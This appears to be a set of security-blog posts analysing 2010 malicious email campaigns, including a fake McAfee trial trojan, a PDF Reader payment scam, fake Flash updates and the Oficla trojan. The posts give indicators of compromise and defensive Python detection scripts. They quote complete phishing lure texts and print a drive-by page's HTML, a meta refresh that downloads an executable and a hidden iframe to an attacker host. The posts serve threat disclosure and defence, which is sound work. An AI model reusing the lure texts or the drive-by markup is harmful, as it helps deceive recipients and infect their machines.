Emails with 30-day trials of McAfee VirusScan Plus contain a trojan

MX Lab intercepted emails with the subject “McAfee VirusScan Plus” that contain a virus. The address in the From header is in the format “xxx.be Member Services” <support@xxxxx.be>, but the real SMTP envelope sender comes primarily from the domains rote-rose.com and rotary1918.com at the time of writing.

The body of the email:

Download a FREE 30-day Trial of MCAfee VirusScan Plus and Be Automaticaly Entered to Win

Installation file attached

The email contains the attachment setup.zip, which holds the 144 kB file setup.exe.

The trojan is known as Mal/Behav-321 (Sophos), TROJ_FAKEAV.SMXG (Trend Micro) and W32/Trojan3.BWP (Authentium).

VirusTotal permalink and MD5: d3de1f75b8151c284ab04819994c0dc9.
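As an added example (not code from the MX Lab post), here is how a mail filter can surface the two indicators described above: a From header whose domain differs from the SMTP envelope sender the receiving MTA recorded in Return-Path, and a zip/exe attachment. The message is constructed; example.be stands in for the xxx.be address and the base64 body is an empty zip rather than a real payload.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample shaped like the campaign above: a .be "Member Services"
# From header, an envelope sender (Return-Path) at rote-rose.com and a
# setup.zip attachment. The base64 is an empty zip, not a real payload.
SAMPLE = b"""Return-Path: <bounce@rote-rose.com>
From: "example.be Member Services" <support@example.be>
Subject: McAfee VirusScan Plus
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Download a FREE 30-day Trial of McAfee VirusScan Plus
--b1
Content-Type: application/zip; name="setup.zip"
Content-Disposition: attachment; filename="setup.zip"
Content-Transfer-Encoding: base64

UEsFBgAAAAAAAAAAAAAAAAAAAAAAAAAA==
--b1--
"""

RISKY_SUFFIXES = (".zip", ".exe")  # what this campaign used; extend as needed


def address_domain(header_value) -> str:
    """Lower-cased domain of an address header value, '' when absent."""
    _, addr = parseaddr(str(header_value or ""))
    return addr.rpartition("@")[2].lower()


def sender_mismatch(raw: bytes):
    """(From domain, envelope domain, mismatch?) for one raw message.
    Return-Path is the receiving MTA's record of the SMTP MAIL FROM."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    from_dom = address_domain(msg.get("From"))
    env_dom = address_domain(msg.get("Return-Path"))
    return from_dom, env_dom, from_dom != env_dom


def risky_attachments(raw: bytes):
    """Attachment filenames ending in one of RISKY_SUFFIXES."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [p.get_filename() for p in msg.iter_attachments()
            if (p.get_filename() or "").lower().endswith(RISKY_SUFFIXES)]
```

A mismatch alone is not proof of spoofing (mailing lists and forwarders cause it too), so treat it as one score input next to the attachment check and the AV verdict.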

Emails offering PDF Reader 2010 lead to an insecure payment site

MX Lab intercepted some emails with the subject “Upgrade New PDF Acrobat Reader/Writer For Windows And Mac” from the email address “Adobe <newsletter@adobe-upgrade-2010.com>”. Notice the use of the Adobe name in the sender address. In the email, an offer is made to download the new PDF Reader 2010 for Windows and Mac.

This is the body of the email:

PDF Reader 2010 – New Version for Windows and Mac
The latest PDF Reader: Open, Edit Create PDF Files

What’s new in this version :

-Open, edit and view all PDF files.
-Enhanced performance with faster loading and zooming.
-Collect your data and combine it into a high quality document.

hxxp://www.adobe-upgrade-2010.com/

Thank you for choosing us, the worldwide leader in PDF Reader
Solutions.

Best Regards,

Tommy Johnson
PDF Reader 2010

At first sight the web site makes perfect sense: it is a company that offers a PDF Reader/Writer that can do more than Adobe Reader on its own. But when you go further, you will notice some issues with the web site and the offer.

When following the URL in the email, you get redirected to hxxp://2010-pdf-pro.com/.

It seems you can download the software for free: there is no pricing information on the web site, so you proceed with the Download button.

The Download button leads to the page hxxp://2010-pdf-pro.com/join.asp, but you get redirected again, this time to the domain hxxp://secure-signup.ru/. Do not be fooled by the domain name secure-signup.ru: the browser session is not secured at all, while most genuine web shops use a secured https:// session when you sign up for a service or software.

The site asks you to fill in your email address twice for confirmation, your first and last name and country.

When continuing to step 2 you get the membership choices, and here we have it: PDF Reader 2010 does not come for free. You need to choose a 1, 2 or 3 year plan of online access and support.

When you have made your choice you can continue the process by validating your credit card. Notice that you have not been asked for any invoicing details: the web forms did not ask for your address, zip or postcode to create an invoice or proof of purchase.

On the web form to validate your credit card, you still have no secure https:// connection. This means that your details are sent over the internet without any encryption at all and can be read by anyone in a position to intercept the traffic. What’s worse, your credit card details are now in the hands of a person or group with bad intentions.

Update 29 July 2010:

On the 27th we filled in a dummy email address to test the web forms on the web sites above, and today we received a mailing with the following content:

Dear valued customers,

We are pleased to announce the newest version of PDF Reader 2010 which will enable you to view, create, edit and print PDF documents. The PDF format as a global exchange document format is created by Adobe and is the most efficient way to exchange information.

Simply visit the link below and enter your PDF reader code:

PDF Reader Code: 5013
Go here to receive the latest 2010 version

Thank you for choosing us, the worldwide leader in PDF Reader solutions.

Mike Robertson
PDF Reader Support

Copyright PDF Reader 2010 – All rights reserved

You are currently subscribed to sm-pdf as geert@betransport.com
Safely unsubscribe from sm-pdf at any time.

Media Internet Consultants – Edif. Neptuno, Planta Baja, Ave. Ricardo J. Alfaro, Tumba Muerto, n/a, Panama

Behind “Go here to receive the latest 2010 version” is the link hxxp://list.directmediafive.com/t/2549518/64766653/4988/0/ that will redirect you to hxxp://new-pdf-reader.com/1/promo/index.asp?aff=11677&camp=pdf_x1

The web form is now somewhat different and allows you to fill in your PDF Reader code 5013. Based on this you get a certain discount. When we wanted to leave the page and go back one page, we got a pop-up window with a 50% reduction in the price, offered for a 24-hour period with a countdown counter on the site.

When going further through the process, we did get an https:// connection for sending the credit card details. But based on the facts above and mentioned in this article, I would not recommend anyone doing this. There are too many variables that give us the idea that buying on this site will result in trouble.

The mailing also contains an unsubscribe URL using hxxp://list.directmediafive.com/. It gives you the idea that this is a genuine company. But what is quite interesting is that when visiting the domain http://www.directmediafive.com/ directly, you get the web page of a parked domain.

We have used the unsubscribe URL included in the mailing and will now see what happens during the next few days.

Amazon order and email confirmation emails lead to PDF malware

Since last week, MX Lab has been intercepting emails asking you to confirm your email address or orders processed by Amazon. This campaign has been received in quite large quantities and we have been investigating what the emails are about.

At first we thought they were phishing emails, but so far we have not been able to establish a connection to the sites mentioned in the URLs included in the message.

This is the latest screenshot of an email requesting confirmation of the email address. The layout is very well done, as you can see. The Amazon images are embedded in the message through an image tag and are loaded directly from Amazon’s own servers.

But the links in the email are obfuscated and point to web sites like:

hxxp://busnwsonline.com/index.php?pid=14

Which redirects in this case to:

hxxp://lunchstroke.ru:8080/index.php?pid=14

Following the URL leads you to short-lived web sites hosting malicious PDF files. The PDF file appears to be served inside an HTML iframe tag so that it opens without any user interaction.

Adobe Flash malware in what appear to be phishing emails

MX Lab intercepted some emails that appear to be genuine phishing emails, but when investigating the included URLs further, they are in fact an attempt to install malware on the computer, disguised as an important Flash Player update from Adobe.

Online Banking Account Alert

The first example comes from the spoofed email address “Electronic Payments Association <buttesob62@rowan-glen.com>” with the subject “Online Banking Account Alert!” and this is the body of the email:

You must submit verification documents to continue using your account without interruption. To view the details of this request and submit the required information, click on the following link (or copy & paste it into your web browser):

hxxp://astroereyna.gr/

We thank you for your assistance in this matter.

When visiting the web site with Firefox we got the message “Sorry, you need to install flash player to see this content…” and our download manager opened to download the file adobe_flash_install.exe. This is the source of the web page:

Sorry, you need to install flash player to see this content...

<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>

However, on Safari we got an HTML frameset to access the web site instead. It appears that some JavaScript redirection is active.
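As an added example (not code from the post), a small scanner for the two constructs in the page source above: a meta refresh that lands on an executable, and a 1x1 or hidden iframe. The sample is the page’s own snippet with its defanged hxxp:// URLs; EXECUTABLE_SUFFIXES is an assumption that goes beyond the .exe the page served.

```python
from html.parser import HTMLParser

# The page source quoted above, joined back onto single lines. The URLs are
# kept defanged (hxxp://) exactly as the post shows them.
PAGE = """Sorry, you need to install flash player to see this content...
<meta http-equiv="refresh" content="3;url=hxxp://astroereyna.gr/adobe_flash_install.exe" />
<iframe src='hxxp://diamonddoctor.ru:8080/index.php?pid=10' width='1' height='1' style='visibility: hidden;'></iframe>
"""

# .exe is what the page served; the other suffixes are an assumption.
EXECUTABLE_SUFFIXES = (".exe", ".scr", ".msi")


class DriveByScanner(HTMLParser):
    """Collects (indicator, url) pairs for the two tricks shown in the post:
    a meta refresh that lands on an executable, and a hidden/1x1 iframe."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "").strip() for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content is "<seconds>;url=<target>"; take everything after url=
            content = a.get("content", "")
            idx = content.lower().find("url=")
            target = content[idx + 4:].strip().strip("'\"") if idx >= 0 else ""
            path = target.lower().split("?", 1)[0]
            if path.endswith(EXECUTABLE_SUFFIXES):
                self.findings.append(("meta-refresh-to-executable", target))
        elif tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            style = a.get("style", "").replace(" ", "").lower()
            hidden = "visibility:hidden" in style or "display:none" in style
            if tiny or hidden:
                self.findings.append(("hidden-iframe", a.get("src", "")))


def scan_html(html: str):
    """Return the list of suspicious constructs found in the HTML, in order."""
    scanner = DriveByScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Because the Safari visit got different content, such a scanner should fetch with several User-Agent strings before concluding a page is clean.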

An unauthorized transaction billed from your bank account

The second example comes from the spoofed address “Electronic Payments Association <euphemismm215@reagirona.com>”, has the subject “An unauthorized transaction billed from your bank account” and this is the body of the email:

Dear bank account holder,

The ACH transaction, recently initiated from your bank account, was rejected by the Electronic Payments Association. Please review the transaction report by clicking the link below:

Unauthorized ACH Transaction Report

——————————————————————

Copyright ©2010 by NACHA – The Electronic Payments Association

The text “Unauthorized ACH Transaction Report” contains a link to a fast flux domain. Following the link gives us the screen below in the browser, together with a download of the file adobe_flash_install.exe.

At the time of writing, none of the AV engines at VirusTotal detected the threat. VirusTotal permalink and MD5: 97732f717f50c38714a3f9c8d8c6274a.

Oficla trojan in emails with subject “Scan from a Xerox WorkCentre Pro”

MX Lab intercepted some emails with the subject “Scan from a Xerox WorkCentre Pro N 6204257” that contain the latest Oficla trojan variant. The emails are sent from a spoofed email address and carry a subject in one of the following formats:

Scan from a Xerox WorkCentre Pro N 6204257
Scan from a Xerox WorkCentre Pro #866521

The email targets business users. It is quite common for an office print and scan centre, such as a Xerox machine, to send a scanned document by email to a recipient.

The body of the email:

Please open the attached document. It was scanned and sent to you using a Xerox
WorkCentre Pro.

Sent by: Guest
Number of Images: 1
Attachment File Type: ZIP [DOC]

WorkCentre Pro Location: machine location not set
Device Name: XRX6150AA7ACDB45706461

For more information on Xerox products and solutions, please visit

http://www.xerox.com

The email contains a ZIP archive named XeroxN6204257.zip with the 32 kB file Xerox_doc.exe inside. Note that the number in the ZIP archive name matches the number in the subject line and differs with each email.

The trojan is known as Gen:Variant.Oficla.4 (F-Secure, GData, NSecure) or W32/Oficla.AP (Authentium).

The following files will be created:

%Temp%\1.tmp
%System%\thxr.wgo
%Temp%\2.tmp
%System%\svrwsc.exe

The following directories are created:

%CommonAppData%\Microsoft\OFFICE
%CommonAppData%\Microsoft\OFFICE\TEMP

The Windows service SvrWsc, with display name Windows Security Center Service and the filename %System%\svrwsc.exe, will be stopped. Do not be fooled: this Windows Security Center Service is a malicious service and has nothing to do with the legitimate Windows Security Center service.

Several Windows registry changes will be executed and the trojan can establish connections to the following IPs on port 80:

80.74.132.218
91.212.127.40
91.216.215.66

Data can be obtained from the following URLs:

  • hxxp://www.kollo.ch/images/cgi.exe
  • hxxp://musiceng.ru/music/forum/index1.php
  • hxxp://hulejsoops.ru/images/bb.php?v=200&id=465538349&b=avpsales&tm=1
  • hxxp://hulejsoops.ru/images/bb.php?v=200&id=465538349&tid=26&b=avpsales&r=1&tm=1

At the time of writing, only 6 of the 41 AV engines at VirusTotal detected the trojan. VirusTotal permalink and MD5: 1d378a6bc94d5b5a702026d31c21e242.

Flickr welcome message leads to Canadian Pharmacy web site

Various brands have been the subject of spam campaigns, and today Flickr, the photo sharing web site, is also being abused by spammers.

MX Lab started to intercept messages with the subject “[Flickr] Welcome!”, sent from a spoofed email address, with a welcome message from Flickr (see image below).

Every link in the message leads to a different URL, even the links behind Terms of Service and the Privacy Policy.


All of these web sites function as a redirect to hxxp://keptoften.com/.

Each message has different URLs included so these spammers are using a massive amount of domains in this campaign.

I personally do not understand why they are doing this, because an Intent Analysis filter, which analyses the URLs included in emails, can blacklist many URLs from these web sites immediately when investigating one single spam message.

When visiting the sites using only the domain name, we quite often get a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy, hxxp://pharmacymentalhealth.com (see image below).
